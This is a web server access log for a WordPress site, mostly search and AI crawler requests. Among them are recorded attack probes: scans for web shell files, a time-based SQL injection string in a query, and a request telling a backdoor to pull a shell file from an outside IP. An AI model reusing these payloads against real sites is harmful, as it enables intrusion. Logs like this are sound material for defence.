202.56.2.88 - - [18/Oct/2025:15:55:13 -0400] "GET /about.php HTTP/1.1" 404 10898 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:15:55:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760817314.1695449352264404296875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:15:55:13 -0400] "GET /interface-data/books-init HTTP/1.1" 404 10903 "https://salhab360photos.com" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:55:30 -0400] "GET /wp-admin/css/about.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:55:31 -0400] "GET /wp-login.php?redirect_to=https%3A%2F%2Fsalhab360photos.com%2Fwp-admin%2Fcss%2Fabout.php&reauth=1 HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:55:47 -0400] "GET /wso1337.php HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:56:13 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:56:13 -0400] "GET /wp-json/wp/v2/give_forms/ HTTP/1.1" 404 114 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
66.249.64.107 - - [18/Oct/2025:15:56:15 -0400] "GET /products11701450?kg=0011558832 HTTP/1.1" 200 28954 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:15:56:19 -0400] "GET /products111870432?kg=0110506241 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:56:21 -0400] "GET /wp-ver.php HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:56:25 -0400] "GET /products6804884?kg=0006721979 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:56:29 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
202.56.2.88 - - [18/Oct/2025:15:54:35 -0400] "GET /css.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:54:39 -0400] "GET /products40738342?kg=0040241614 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:15:54:49 -0400] "GET /products11501110?kg=0011360934 HTTP/1.1" 200 29333 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:15:54:54 -0400] "GET /products87961268?kg=0086888651 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:55:56 -0400] "POST /v1/proxy/test HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15"
202.56.2.88 - - [18/Oct/2025:15:56:03 -0400] "GET /wp-includes/wp-login.php HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:15:56:10 -0400] "GET /products60911928?kg=0060169181 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:15:56:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760817377.5245409011840820312500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:15:56:16 -0400] "GET /products111863630?kg=0110499522 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:22 -0400] "GET /products197004672?kg=0194602257 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:15:56:26 -0400] "GET /products11985006?kg=0011838930 HTTP/1.1" 200 28919 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:15:56:31 -0400] "GET /products54911878?kg=0054242302 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:56:38 -0400] "POST /api/v0/train HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:56:39 -0400] "GET /new-index.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:56:40 -0400] "GET /products6808260?kg=0006725315 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:43 -0400] "GET /products130114808?kg=0128528125 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:46 -0400] "GET /products173257636?kg=0171144819 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:49 -0400] "GET /products173224394?kg=0171111984 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:28 -0400] "GET /products158699766?kg=0156764486 HTTP/1.1" 404 9734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:34 -0400] "GET /products6789030?kg=0006706318 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:37 -0400] "GET /products6793864?kg=0006711093 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:52 -0400] "GET /products130098826?kg=0128512336 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:56:53 -0400] "GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
202.56.2.88 - - [18/Oct/2025:15:57:01 -0400] "GET /1index.php HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:57:02 -0400] "GET /products6787258?kg=0006704568 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:11 -0400] "GET /products95229024?kg=0094067777 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:15:57:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760817435.1880350112915039062500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:15:57:14 -0400] "GET /products34925896?kg=0034500053 HTTP/1.1" 404 9735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:15:57:15 -0400] "GET /products60884066?kg=0060141660 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:15:57:17 -0400] "GET /products206189578?kg=0203675152 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:57:18 -0400] "GET /2index.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
98.70.29.56 - - [18/Oct/2025:15:57:22 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
216.73.216.159 - - [18/Oct/2025:15:57:23 -0400] "GET /products119053632?kg=0117601841 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:29 -0400] "GET /products95175846?kg=0094015246 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:38 -0400] "GET /products34934952?kg=0034508997 HTTP/1.1" 404 9736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:47 -0400] "GET /products3441704?kg=0003399813 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:50 -0400] "GET /products7209886?kg=0007122042 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:56:59 -0400] "GET /products173255864?kg=0171143069 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:05 -0400] "GET /products54856278?kg=0054187382 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:08 -0400] "GET /products3428962?kg=0003387228 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:20 -0400] "GET /products34927034?kg=0034501176 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:26 -0400] "GET /products173227164?kg=0171114719 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:32 -0400] "GET /products78148214?kg=0077195270 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:57:34 -0400] "GET /sindex.php HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:57:35 -0400] "GET /products173216194?kg=0171103884 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:41 -0400] "GET /products173257304?kg=0171144493 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:44 -0400] "GET /products173252388?kg=0171139635 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:57:50 -0400] "GET /old-index.php HTTP/1.1" 404 10899 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:57:53 -0400] "GET /products34922246?kg=0034496446 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:57:56 -0400] "GET /products54868546?kg=0054199500 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:05 -0400] "GET /products146606356?kg=0144818555 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:08 -0400] "GET /products179078684?kg=0176894879 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:58:09 -0400] "GET /baindex.php HTTP/1.1" 404 10897 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:58:11 -0400] "GET /products119141240?kg=0117688381 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:15:58:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760817495.1089270114898681640625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:15:58:14 -0400] "GET /products80620058?kg=0079636968 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:02 -0400] "GET /products22800752?kg=0022522777 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:17 -0400] "GET /products54855012?kg=0054186131 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:15:58:20 -0400] "GET /products60886394?kg=0060143960 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:15:58:23 -0400] "GET /products7189842?kg=0007102244 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:58:26 -0400] "POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0"
216.73.216.159 - - [18/Oct/2025:15:58:26 -0400] "GET /products119120498?kg=0117667892 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:38 -0400] "GET /products158729650?kg=0156794004 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:58:43 -0400] "GET /wp-add.php?a=d&f=bads&l=http://157.20.32.219/shell/shell1.txt HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:15:58:47 -0400] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:58:47 -0400] "GET /products148378996?kg=0146569579 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:50 -0400] "GET /products7252568?kg=0007164205 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:53 -0400] "GET /products159608294?kg=0157661934 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:56 -0400] "GET /products119150132?kg=0117697163 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:15:58:58 -0400] "GET /products6149230?kg=0006074322 HTTP/1.1" 200 29185 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:15:58:59 -0400] "GET /products158684232?kg=0156749141 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:59:05 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:59:05 -0400] "GET /products234645546?kg=0231784096 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:59:08 -0400] "GET /products155032772?kg=0153142211 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:20 -0400] "GET /products7193692?kg=0007106047 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:58:26 -0400] "GET /wikindex.php HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:58:29 -0400] "GET /products159574752?kg=0157628801 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:32 -0400] "GET /products235626098?kg=0232752692 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.37.118.79 - - [18/Oct/2025:15:58:32 -0400] "GET /products158887546?kg=0156949976 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.20.32.210 - - [18/Oct/2025:15:58:34 -0400] "GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:58:35 -0400] "GET /products199388444?kg=0196956959 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:41 -0400] "GET /products155006358?kg=0153116118 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:58:44 -0400] "GET /products119151280?kg=0117698297 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:59:01 -0400] "GET /alfanew.php HTTP/1.1" 404 10896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:59:02 -0400] "GET /products173261854?kg=0171148986 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:59:11 -0400] "GET /products3407556?kg=0003366083 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:15:59:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760817555.0547180175781250000000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
202.56.2.88 - - [18/Oct/2025:15:59:15 -0400] "GET /wp-p.php7 HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:15:59:26 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
3.8.127.128 - - [18/Oct/2025:15:59:26 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
216.73.216.159 - - [18/Oct/2025:15:59:26 -0400] "GET /products157382354?kg=0155463140 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:59:27 -0400] "GET /wp-includes/repeater.php HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:59:14 -0400] "GET /products158689306?kg=0156754152 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:59:17 -0400] "GET /products158707802?kg=0156772424 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:59:20 -0400] "GET /products235650702?kg=0232776994 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:15:59:21 -0400] "GET /products60876066?kg=0060133756 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:15:59:23 -0400] "GET /products117752128?kg=0116316209 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
146.190.11.185 - - [18/Oct/2025:15:59:28 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
